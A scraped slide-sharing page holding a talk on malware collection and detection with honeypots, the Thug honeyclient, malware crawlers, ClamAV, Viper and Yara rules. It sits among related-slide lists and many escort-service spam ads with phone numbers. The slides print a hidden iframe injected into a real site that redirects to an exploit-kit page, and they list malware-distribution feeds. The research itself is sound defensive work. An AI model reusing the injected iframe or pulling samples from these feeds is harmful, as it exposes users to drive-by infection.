"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
 
Vpn 3854d825
Vpn 3854d825Vpn 3854d825
Vpn 3854d825
 
Incident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsIncident response: Advanced Network Forensics
Incident response: Advanced Network Forensics
 
DMVPN Lab WorkBook
DMVPN Lab WorkBookDMVPN Lab WorkBook
DMVPN Lab WorkBook
 
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
 
Openssl
OpensslOpenssl
Openssl
 
Triển khai vpn client to site qua router gpon
Triển khai vpn client to site qua router gponTriển khai vpn client to site qua router gpon
Triển khai vpn client to site qua router gpon
 

Andere mochten auch

BPM e Transformação Digital no Grupo Multicobra
BPM e Transformação Digital no Grupo MulticobraBPM e Transformação Digital no Grupo Multicobra
BPM e Transformação Digital no Grupo MulticobraLecom Tecnologia
 
Elizabeth_Moran_Land Pax Comments
Elizabeth_Moran_Land Pax CommentsElizabeth_Moran_Land Pax Comments
Elizabeth_Moran_Land Pax CommentsElizabeth Moran
 
Trabajo de proyecto integrado
Trabajo de proyecto integradoTrabajo de proyecto integrado
Trabajo de proyecto integradoIngridydesy
 
Web企業における大規模組織での品質の取り組み
Web企業における大規模組織での品質の取り組みWeb企業における大規模組織での品質の取り組み
Web企業における大規模組織での品質の取り組みteyamagu
 
Digital Storytelling Quotes
Digital Storytelling QuotesDigital Storytelling Quotes
Digital Storytelling QuotesDavid Jakes
 
AWS初心者向けWebinar .NET開発者のためのAWS超入門
AWS初心者向けWebinar .NET開発者のためのAWS超入門AWS初心者向けWebinar .NET開発者のためのAWS超入門
AWS初心者向けWebinar .NET開発者のためのAWS超入門Amazon Web Services Japan
 

Andere mochten auch (11)

Wardrobe
WardrobeWardrobe
Wardrobe
 
Jose marc3ada-mellado
Jose marc3ada-melladoJose marc3ada-mellado
Jose marc3ada-mellado
 
BPM e Transformação Digital no Grupo Multicobra
BPM e Transformação Digital no Grupo MulticobraBPM e Transformação Digital no Grupo Multicobra
BPM e Transformação Digital no Grupo Multicobra
 
Sudhakar Resume
Sudhakar ResumeSudhakar Resume
Sudhakar Resume
 
Self-intro
Self-introSelf-intro
Self-intro
 
Elizabeth_Moran_Land Pax Comments
Elizabeth_Moran_Land Pax CommentsElizabeth_Moran_Land Pax Comments
Elizabeth_Moran_Land Pax Comments
 
Trabajo de proyecto integrado
Trabajo de proyecto integradoTrabajo de proyecto integrado
Trabajo de proyecto integrado
 
Web企業における大規模組織での品質の取り組み
Web企業における大規模組織での品質の取り組みWeb企業における大規模組織での品質の取り組み
Web企業における大規模組織での品質の取り組み
 
Digital Storytelling Quotes
Digital Storytelling QuotesDigital Storytelling Quotes
Digital Storytelling Quotes
 
AWS初心者向けWebinar .NET開発者のためのAWS超入門
AWS初心者向けWebinar .NET開発者のためのAWS超入門AWS初心者向けWebinar .NET開発者のためのAWS超入門
AWS初心者向けWebinar .NET開発者のためのAWS超入門
 
Trees, Binary Search Tree, AVL Tree in Data Structures
Trees, Binary Search Tree, AVL Tree in Data Structures Trees, Binary Search Tree, AVL Tree in Data Structures
Trees, Binary Search Tree, AVL Tree in Data Structures
 

Ähnlich wie و کشف بد افزار OSSEC

Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
Ganglia Overview-v2
Ganglia Overview-v2Ganglia Overview-v2
Ganglia Overview-v2Chris Westin
 
Михаил Зеленков: Внедрение ipv6 в Яндекс.Поиске
Михаил Зеленков: Внедрение ipv6 в Яндекс.ПоискеМихаил Зеленков: Внедрение ipv6 в Яндекс.Поиске
Михаил Зеленков: Внедрение ipv6 в Яндекс.ПоискеYandex
 
Piwik elasticsearch kibana at OSC Tokyo 2016 Spring
Piwik elasticsearch kibana at OSC Tokyo 2016 SpringPiwik elasticsearch kibana at OSC Tokyo 2016 Spring
Piwik elasticsearch kibana at OSC Tokyo 2016 SpringTakashi Yamamoto
 
Watching And Manipulating Your Network Traffic
Watching And Manipulating Your Network TrafficWatching And Manipulating Your Network Traffic
Watching And Manipulating Your Network TrafficJosiah Ritchie
 
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)Pavel Odintsov
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 
Building an Automated Behavioral Malware Analysis Environment using Free and ...
Building an Automated Behavioral Malware Analysis Environment using Free and ...Building an Automated Behavioral Malware Analysis Environment using Free and ...
Building an Automated Behavioral Malware Analysis Environment using Free and ...Jim Clausing
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptxssuserfcf43f
 
Multihomed Linux router
Multihomed Linux routerMultihomed Linux router
Multihomed Linux routerMarian Marinov
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby SystemsEngine Yard
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Cybersecurity Asia 2021 Conference: Learning from Honeypots
Cybersecurity Asia 2021 Conference: Learning from HoneypotsCybersecurity Asia 2021 Conference: Learning from Honeypots
Cybersecurity Asia 2021 Conference: Learning from HoneypotsAPNIC
 
Introducing Scylla Manager: Cluster Management and Task Automation
Introducing Scylla Manager: Cluster Management and Task AutomationIntroducing Scylla Manager: Cluster Management and Task Automation
Introducing Scylla Manager: Cluster Management and Task AutomationScyllaDB
 
Building OpenDNS Stats
Building OpenDNS StatsBuilding OpenDNS Stats
Building OpenDNS StatsGeorge Ang
 
Creating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server HardeningCreating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server Hardeningarchwisp
 
Как понять, что происходит на сервере? / Александр Крижановский (NatSys Lab.,...
Как понять, что происходит на сервере? / Александр Крижановский (NatSys Lab.,...Как понять, что происходит на сервере? / Александр Крижановский (NatSys Lab.,...
Как понять, что происходит на сервере? / Александр Крижановский (NatSys Lab.,...Ontico
 
DDoS: Practical Survival Guide
DDoS: Practical Survival GuideDDoS: Practical Survival Guide
DDoS: Practical Survival GuideHLL
 

Ähnlich wie و کشف بد افزار OSSEC (20)

Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
Ganglia Overview-v2
Ganglia Overview-v2Ganglia Overview-v2
Ganglia Overview-v2
 
Михаил Зеленков: Внедрение ipv6 в Яндекс.Поиске
Михаил Зеленков: Внедрение ipv6 в Яндекс.ПоискеМихаил Зеленков: Внедрение ipv6 в Яндекс.Поиске
Михаил Зеленков: Внедрение ipv6 в Яндекс.Поиске
 
Piwik elasticsearch kibana at OSC Tokyo 2016 Spring
Piwik elasticsearch kibana at OSC Tokyo 2016 SpringPiwik elasticsearch kibana at OSC Tokyo 2016 Spring
Piwik elasticsearch kibana at OSC Tokyo 2016 Spring
 
Watching And Manipulating Your Network Traffic
Watching And Manipulating Your Network TrafficWatching And Manipulating Your Network Traffic
Watching And Manipulating Your Network Traffic
 
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)
Ultra fast DDoS Detection with FastNetMon at Coloclue (AS 8283)
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 
Building an Automated Behavioral Malware Analysis Environment using Free and ...
Building an Automated Behavioral Malware Analysis Environment using Free and ...Building an Automated Behavioral Malware Analysis Environment using Free and ...
Building an Automated Behavioral Malware Analysis Environment using Free and ...
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptx
 
Multihomed Linux router
Multihomed Linux routerMultihomed Linux router
Multihomed Linux router
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Cybersecurity Asia 2021 Conference: Learning from Honeypots
Cybersecurity Asia 2021 Conference: Learning from HoneypotsCybersecurity Asia 2021 Conference: Learning from Honeypots
Cybersecurity Asia 2021 Conference: Learning from Honeypots
 
Introducing Scylla Manager: Cluster Management and Task Automation
Introducing Scylla Manager: Cluster Management and Task AutomationIntroducing Scylla Manager: Cluster Management and Task Automation
Introducing Scylla Manager: Cluster Management and Task Automation
 
Building OpenDNS Stats
Building OpenDNS StatsBuilding OpenDNS Stats
Building OpenDNS Stats
 
Creating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server HardeningCreating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server Hardening
 
Как понять, что происходит на сервере? / Александр Крижановский (NatSys Lab.,...
Как понять, что происходит на сервере? / Александр Крижановский (NatSys Lab.,...Как понять, что происходит на сервере? / Александр Крижановский (NatSys Lab.,...
Как понять, что происходит на сервере? / Александр Крижановский (NatSys Lab.,...
 
DDoS: Practical Survival Guide
DDoS: Practical Survival GuideDDoS: Practical Survival Guide
DDoS: Practical Survival Guide
 

Kürzlich hochgeladen

Hot Vip Call Girls Service In Sector 149,9818099198 Young Female Escorts Serv...
Hot Vip Call Girls Service In Sector 149,9818099198 Young Female Escorts Serv...Hot Vip Call Girls Service In Sector 149,9818099198 Young Female Escorts Serv...
Hot Vip Call Girls Service In Sector 149,9818099198 Young Female Escorts Serv...riyaescorts54
 
CALL GIRLS 9999288940 women seeking men Locanto No Advance North Goa
CALL GIRLS 9999288940 women seeking men Locanto No Advance North GoaCALL GIRLS 9999288940 women seeking men Locanto No Advance North Goa
CALL GIRLS 9999288940 women seeking men Locanto No Advance North Goadelhincr993
 
Call Now ☎9870417354|| Call Girls in Dwarka Escort Service Delhi N.C.R.
Call Now ☎9870417354|| Call Girls in Dwarka Escort Service Delhi N.C.R.Call Now ☎9870417354|| Call Girls in Dwarka Escort Service Delhi N.C.R.
Call Now ☎9870417354|| Call Girls in Dwarka Escort Service Delhi N.C.R.riyadelhic riyadelhic
 
Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...
Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...
Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...aakahthapa70
 
+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...
+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...
+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...teencall080
 
Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...
Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...
Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...riyasharma00119
 
Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...
Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...
Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...aakahthapa70
 
Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...
Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...
Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...aakahthapa70
 
JAMNAGAR CALL GIRLS 92628/71154 JAMNAGAR
JAMNAGAR CALL GIRLS 92628/71154 JAMNAGARJAMNAGAR CALL GIRLS 92628/71154 JAMNAGAR
JAMNAGAR CALL GIRLS 92628/71154 JAMNAGARNiteshKumar82226
 
Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...
Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...
Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...aakahthapa70
 
Best VIP Call Girls Noida Sector 23 Call Me: 8700611579
Best VIP Call Girls Noida Sector 23 Call Me: 8700611579Best VIP Call Girls Noida Sector 23 Call Me: 8700611579
Best VIP Call Girls Noida Sector 23 Call Me: 8700611579diyaspanoida
 
Call US Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...
Call US Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...Call US Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...
Call US Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...Pooja Nehwal
 
Best VIP Call Girl Noida Sector 48 Call Me: 8700611579
Best VIP Call Girl Noida Sector 48 Call Me: 8700611579Best VIP Call Girl Noida Sector 48 Call Me: 8700611579
Best VIP Call Girl Noida Sector 48 Call Me: 8700611579diyaspanoida
 
VAPI CALL GIRL 92628/71154 VAPI CALL GIR
VAPI CALL GIRL 92628/71154 VAPI CALL GIRVAPI CALL GIRL 92628/71154 VAPI CALL GIR
VAPI CALL GIRL 92628/71154 VAPI CALL GIRNiteshKumar82226
 
SANGLI CALL GIRL 92628/71154 SANGLI CALL
SANGLI CALL GIRL 92628/71154 SANGLI CALLSANGLI CALL GIRL 92628/71154 SANGLI CALL
SANGLI CALL GIRL 92628/71154 SANGLI CALLNiteshKumar82226
 
Russian Call Girls in Goa %(9316020077)# Russian Call Girls in Goa By Russi...
Russian Call Girls in Goa %(9316020077)# Russian Call Girls in Goa By Russi...Russian Call Girls in Goa %(9316020077)# Russian Call Girls in Goa By Russi...
Russian Call Girls in Goa %(9316020077)# Russian Call Girls in Goa By Russi...Goa Call Girls Service Goa escort agency
 
9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available
9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available
9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Availablenitugupta1209
 
Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.
Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.
Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.riyadelhic riyadelhic
 
JABALPUR CALL GIRL 92628/71154 JABALPUR K
JABALPUR CALL GIRL 92628/71154 JABALPUR KJABALPUR CALL GIRL 92628/71154 JABALPUR K
JABALPUR CALL GIRL 92628/71154 JABALPUR KNiteshKumar82226
 

Kürzlich hochgeladen (20)

Hot Vip Call Girls Service In Sector 149,9818099198 Young Female Escorts Serv...
Hot Vip Call Girls Service In Sector 149,9818099198 Young Female Escorts Serv...Hot Vip Call Girls Service In Sector 149,9818099198 Young Female Escorts Serv...
Hot Vip Call Girls Service In Sector 149,9818099198 Young Female Escorts Serv...
 
CALL GIRLS 9999288940 women seeking men Locanto No Advance North Goa
CALL GIRLS 9999288940 women seeking men Locanto No Advance North GoaCALL GIRLS 9999288940 women seeking men Locanto No Advance North Goa
CALL GIRLS 9999288940 women seeking men Locanto No Advance North Goa
 
Call Now ☎9870417354|| Call Girls in Dwarka Escort Service Delhi N.C.R.
Call Now ☎9870417354|| Call Girls in Dwarka Escort Service Delhi N.C.R.Call Now ☎9870417354|| Call Girls in Dwarka Escort Service Delhi N.C.R.
Call Now ☎9870417354|| Call Girls in Dwarka Escort Service Delhi N.C.R.
 
Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...
Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...
Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...
 
+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...
+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...
+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...
 
Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...
Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...
Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...
 
Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...
Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...
Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...
 
Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...
Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...
Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...
 
Call Girls In Goa For Fun 9316020077 By Goa Call Girls For Pick Up Night
Call Girls In Goa For Fun 9316020077 By Goa Call Girls For Pick Up NightCall Girls In Goa For Fun 9316020077 By Goa Call Girls For Pick Up Night
Call Girls In Goa For Fun 9316020077 By Goa Call Girls For Pick Up Night
 
JAMNAGAR CALL GIRLS 92628/71154 JAMNAGAR
JAMNAGAR CALL GIRLS 92628/71154 JAMNAGARJAMNAGAR CALL GIRLS 92628/71154 JAMNAGAR
JAMNAGAR CALL GIRLS 92628/71154 JAMNAGAR
 
Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...
Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...
Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...
 
Best VIP Call Girls Noida Sector 23 Call Me: 8700611579
Best VIP Call Girls Noida Sector 23 Call Me: 8700611579Best VIP Call Girls Noida Sector 23 Call Me: 8700611579
Best VIP Call Girls Noida Sector 23 Call Me: 8700611579
 
Call US Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...
Call US Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...Call US Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...
Call US Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...
 
Best VIP Call Girl Noida Sector 48 Call Me: 8700611579
Best VIP Call Girl Noida Sector 48 Call Me: 8700611579Best VIP Call Girl Noida Sector 48 Call Me: 8700611579
Best VIP Call Girl Noida Sector 48 Call Me: 8700611579
 
VAPI CALL GIRL 92628/71154 VAPI CALL GIR
VAPI CALL GIRL 92628/71154 VAPI CALL GIRVAPI CALL GIRL 92628/71154 VAPI CALL GIR
VAPI CALL GIRL 92628/71154 VAPI CALL GIR
 
SANGLI CALL GIRL 92628/71154 SANGLI CALL
SANGLI CALL GIRL 92628/71154 SANGLI CALLSANGLI CALL GIRL 92628/71154 SANGLI CALL
SANGLI CALL GIRL 92628/71154 SANGLI CALL
 
Russian Call Girls in Goa %(9316020077)# Russian Call Girls in Goa By Russi...
Russian Call Girls in Goa %(9316020077)# Russian Call Girls in Goa By Russi...Russian Call Girls in Goa %(9316020077)# Russian Call Girls in Goa By Russi...
Russian Call Girls in Goa %(9316020077)# Russian Call Girls in Goa By Russi...
 
9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available
9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available
9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available
 
Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.
Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.
Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.
 
JABALPUR CALL GIRL 92628/71154 JABALPUR K
JABALPUR CALL GIRL 92628/71154 JABALPUR KJABALPUR CALL GIRL 92628/71154 JABALPUR K
JABALPUR CALL GIRL 92628/71154 JABALPUR K
 

و کشف بد افزار OSSEC

  • 2. Setting up a malware lab Collection Analysis Detection @santiagobassett
  • 3. MW collection techniques @santiagobassett Honeypots Web spiders - honeyclients Malware crawlers
  • 4. Honeypot @santiagobassett Dionaea: Low interaction honeypot that emulates vulnerable network services. https://github.com/rep/dionaea (written in C) santiago@cuckoo:~$ nmap dionaea Starting Nmap 6.00 ( http://nmap.org ) at 2014-09-07 21:04 PDT Nmap scan report for dionaea (54.235.216.XXX) Host is up (0.070s latency). Not shown: 992 closed ports PORT STATE SERVICE 21/tcp open ftp 42/tcp open nameserver 80/tcp open http 135/tcp open msrpc 443/tcp open https 445/tcp open microsoft-ds 1433/tcp open ms-sql-s 3306/tcp open mysql Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds
  • 5. Honeypot results @santiagobassett • Captured 126 unique binaries in 3 months • Highly detected by clamav (80%) santiago@dionaea:/opt/dionaea/var/dionaea/binaries# clamscan * 022aeb126d2d80e683f7f2a3ee920874: Trojan.Spy-78857 FOUND 05800e1eb163994359e4c946d4a0fecb: Backdoor.Floder-3 FOUND 06267149140c0bc9ba51222c165f2d61: Worm.Autorun-7683 FOUND 0682f3dfbdab7c040ac9307c50792d0a: Trojan.Buzus-9369 FOUND 074b815d9ded01b516a62e3b739caa10: Win.Trojan.Agent-372503 FOUND 07fea379703307c5addc20e237cdd0f0: Win.Trojan.Jorik-1388 FOUND 09481313331ff5a8b8bfa4e25cbaa524: Worm.Autorun-7516 FOUND 0a9f1cd12f1b34ca71fa585e87e91c7d: OK 0b4c4078231ee36731080858187a49b8: Win.Trojan.Injector-8166 FOUND 0feae931ee71a495614f14f3c1d37246: Trojan.Mybot-5073 FOUND 10ec7cb47314a2c08decb25e53fedcfa: Trojan.Injector-558 FOUND 1205a52e42687c922aa4d3700d778398: Trojan.Kazy-1372 FOUND 12fb7332920a7797c2d02df29b57c640: Trojan.Spy-78857 FOUND 16b0357b804d9651d9057b61d78bee08: Win.Trojan.Agent-368816 FOUND 1a813b6ea08a47f2997e2e4215eba96b: WIN.Trojan.IRCBot-1225 FOUND … ----------- SCAN SUMMARY ----------- Known viruses: 3517573 Engine version: 0.98.1 Scanned directories: 0 Scanned files: 126 Infected files: 101 Data scanned: 17.65 MB Data read: 18.11 MB (ratio 0.97:1) Time: 56.447 sec (0 m 56 s)
  • 6. Honeyclient @santiagobassett Thug: Low interaction honeyclient, used to detect drive-by-download attacks. https://github.com/buffer/thug (Python) Thug emulates: • Core browser functionality • ActiveX controls • Browser plugins
  • 7. Drive by download attack @santiagobassett http://urlquery.net/report.php?id=1410227505197
  • 8. Honeyclient results @santiagobassett santiago@mwcollector:~/thug/src$ ./thug.py webgalleriet.no/ [2014-09-11 22:58:31] [HTTP] URL: http://www.webgalleriet.no/wordpress/wp-includes/js/comment- reply.js?ver=20090102 (Status: 200, Referrer: http://www.webgalleriet.no/) [2014-09-11 22:58:31] [HTTP] URL: http://www.webgalleriet.no/wordpress/wp-includes/js/comment- reply.js?ver=20090102 (Content-type: application/javascript, MD5: d484fa08997df765852c6ad283ec52c6) [2014-09-11 22:58:31] <iframe align="center" frameborder="no" height="2" name="Twitter" scrolling="auto" src="http://168bet.com/cocs.html?j=1095012" width="2"></iframe> [2014-09-11 22:58:31] [iframe redirection] http://www.webgalleriet.no/ -> http://168bet.com/cocs.html?j=1095012 [2014-09-11 22:58:31] [URL Classifier] URL: http://168bet.com/cocs.html?j=1095012 (Rule: Redkit 1, Classification: Landing page, Exploit Kit)
  • 9. Malware crawlers @santiagobassett Retrieve files using malware tracking sites. https://github.com/technoskald/maltrieve (Python) https://code.google.com/p/malware-crawler/ (Python) http://malc0de.com/rss http://www.malwareblacklist.com/mbl.xml http://www.malwaredomainlist.com/hostslist/mdl.xml http://vxvault.siri-urz.net/URL_List.php http://urlquery.net/ http://support.clean-mx.de/clean-mx/xmlviruses.php
  • 11. Malware crawlers results @santiagobassett • Captured 345 unique binaries in 15 minutes • Poorly detected by clamav (16%) santiago@mwcollector:~/binaries/maltrieve$ clamscan * 02d36dff08b63b123d2d2a36089e3d97: OK 03a6ac145099cf77bf5c7af127696687: OK 03e49fb415aacf9d2c90821ff0596024: OK 0568a72d4c5a2eb510207ca45b8d8799: OK 06ddb91e1d5f056590dfeef71a2da264: JS.Iframe-2 FOUND 074fbceca8fe84bae582a7a114b2ce94: HTML.Iframe-63 FOUND 0889504acc370f2adec7869b9bc5bc5c: OK 08d53833d032d71c1e7ffd3cddcd2a5e: JS.Iframe-2 FOUND 0ac790c459a0ef9bb4959321918a2d57: OK 0cc1c5c2ef510bd9f587abbc402d04a3: OK 0e3c692048a35c06ffe81a473ffd1d41: OK 136264a09b94bf8f08278b0045a84905: OK 13e78b2bab4a0ae9a3c2003d3f004dd1: JS.Obfus-31 FOUND ----------- SCAN SUMMARY ---------- - Known viruses: 3517100 Engine version: 0.98.4 Scanned directories: 0 Scanned files: 235 Infected files: 38 Data scanned: 164.24 MB Data read: 143.86 MB (ratio 1.14:1) Time: 254.462 sec (4 m 14 s)
  • 12. Malware database - Viper @santiagobassett Binary analysis and management framework. https://github.com/botherder/viper (Python)
  • 13. Static Analysis - Yara @santiagobassett Flexible, human-readable rules for identifying malicious streams. Can be used to analyze: • files • memory (volatility) • network streams. private rule APT1_RARSilent_EXE_PDF { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $winrar1 = "WINRAR.SFX" wide ascii $winrar2 = ";The comment below contains SFX script commands" wide ascii $winrar3 = "Silent=1" wide ascii $str1 = /Setup=[sw"]+.(exe|pdf|doc)/ $str2 = "Steup="" wide ascii condition: all of ($winrar*) and 1 of ($str*) }
  • 14. Static Analysis - Yara @santiagobassett viper > find name 3f2fda43121d888428b66717b984a7fb +---+----------------------------------+-----------------------+----------------------------------+------+ | # | Name | Mime | MD5 | Tags | +---+----------------------------------+-----------------------+----------------------------------+------+ | 1 | 3F2FDA43121D888428B66717B984A7FB | application/x-dosexec | 3f2fda43121d888428b66717b984a7fb | apt | +---+----------------------------------+-----------------------+----------------------------------+------+ viper > open -l 1 [*] Session opened on /home/santiago/viper/binaries/6/a/f/2/6af2116c4b59c69917e0e25efe4530a127830e2ed383ea91e0eebfa1cae4b78e viper 3F2FDA43121D888428B66717B984A7FB > yara scan [*] Scanning 3F2FDA43121D888428B66717B984A7FB (6af2116c4b59c69917e0e25efe4530a127830e2ed383ea91e0eebfa1cae4b78e) +------------------+--------+--------+----------------------------------+ | Rule | String | Offset | Content | +------------------+--------+--------+----------------------------------+ | APT1_WEBC2_TABLE | $msg1 | 440032 | Fail To Execute The Command | | APT1_WEBC2_TABLE | $msg2 | 440060 | Execute The Command Successfully | | APT1_WEBC2_TABLE | $gif1 | 440100 | sdwefa.gif | | APT1_WEBC2_TABLE | $gif1 | 440101 | dwefa.gif | | APT1_WEBC2_TABLE | $gif1 | 440102 | wefa.gif | | APT1_WEBC2_TABLE | $gif1 | 440103 | efa.gif | | APT1_WEBC2_TABLE | $gif1 | 440104 | fa.gif | | APT1_WEBC2_TABLE | $gif1 | 440105 | a.gif | | APT1_WEBC2_TABLE | $gif2 | 440112 | GIF89 | +------------------+--------+--------+----------------------------------+ rule APT1_WEBC2_TABLE { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $msg1 = "Fail To Execute The Command" wide ascii $msg2 = "Execute The Command Successfully" wide ascii $gif1 = /w+.gif/ $gif2 = "GIF89" wide ascii condition: 3 of them } viper 3F2FDA43121D888428B66717B984A7FB > yara rules +----+-----------------------------------+ | # | Path | +----+-----------------------------------+ | 1 | data/yara/hangover.yara | | 2 | data/yara/citizenlab.yara | | 3 | data/yara/APT_NGO_wuaclt_PDF.yara | | 4 | data/yara/kins.yara | | 5 | data/yara/themask.yara | | 6 | data/yara/vmdetect.yara | | 7 | data/yara/index.yara | | 8 | data/yara/GeorBotBinary.yara | | 9 | data/yara/leverage.yar | | 10 